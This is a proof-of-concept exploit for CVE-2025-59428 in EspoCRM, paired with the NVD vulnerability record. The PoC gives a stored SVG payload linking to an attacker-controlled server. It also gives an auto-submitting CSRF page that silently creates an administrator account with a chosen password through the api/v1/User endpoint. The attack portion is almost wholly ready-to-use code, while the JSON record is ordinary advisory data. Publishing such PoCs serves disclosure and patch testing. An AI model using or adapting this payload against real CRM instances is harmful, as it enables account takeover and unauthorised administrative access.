CVE-2025-59428

<!-- CVE-2025-59428 PoC: EspoCRM Stored SVG Injection + CSRF --> <!-- Step 1: Malicious SVG embedded in Knowledge Base article body field --> <!-- Attacker with Knowledge Base edit permission posts the following content --> <svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"> <a href="https://attacker-controlled-server.com/exploit.html" target="_blank"> <rect width="100" height="100" fill="blue"/> <text x="10" y="50" fill="white">Click here for important update</text> </a> </svg> <!-- Step 2: Hosted on attacker server (https://attacker-controlled-server.com/exploit.html) --> <!-- This page auto-submits a CSRF request to create an admin user --> <!DOCTYPE html> <html> <head><title>Important Update</title></head> <body> <form id="csrfForm" method="POST" action="https://victim-espocrm.com/api/v1/User"> <input type="hidden" name="userName" value="admin_support" /> <input type="hidden" name="password" value="P@ssw0rd!2025" /> <input type="hidden" name="firstName" value="Support" /> <input type="hidden" name="lastName" value="Admin" /> <input type="hidden" name="title" value="System Administrator" /> <input type="hidden" name="isAdmin" value="true" /> <input type="hidden" name="type" value="admin" /> </form> <script> // Auto-submit the form to create admin account via CSRF document.getElementById('csrfForm').submit(); </script> </body> </html> <!-- Note: EspoCRM's api/v1/User endpoint lacks CSRF token validation, --> <!-- allowing the browser to send authenticated session cookies automatically. --> <!-- If the victim is an authenticated admin, an attacker-controlled admin account is created. -->

{"cve": {"id": "CVE-2025-59428", "sourceIdentifier": "[email protected]", "published": "2025-10-14T15:16:11.673", "lastModified": "2025-10-20T18:12:29.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EspoCRM is an open source customer relationship management application. In versions before 9.1.9, a vulnerability allows arbitrary user creation, including administrative accounts, through a combination of stored SVG injection and lack of CSRF protection. An attacker with Knowledge Base edit permissions can embed a malicious SVG element containing a link in the body field of an article. When an authenticated user clicks the malicious link, they are redirected to an attacker-controlled HTML page that executes a CSRF request against the api/v1/User endpoint. If the victim is prompted for and enters their credentials, an attacker-controlled account is created with privileges determined by the CSRF payload. This issue has been patched in version 9.1.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.9", "matchCriteriaId": "8F85634C-E414-4BFA-9A30-987F87598B01"}]}]}], "references": [{"url": "https://github.com/espocrm/espocrm/security/advisories/GHSA-c26c-wvhr-fr6r", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}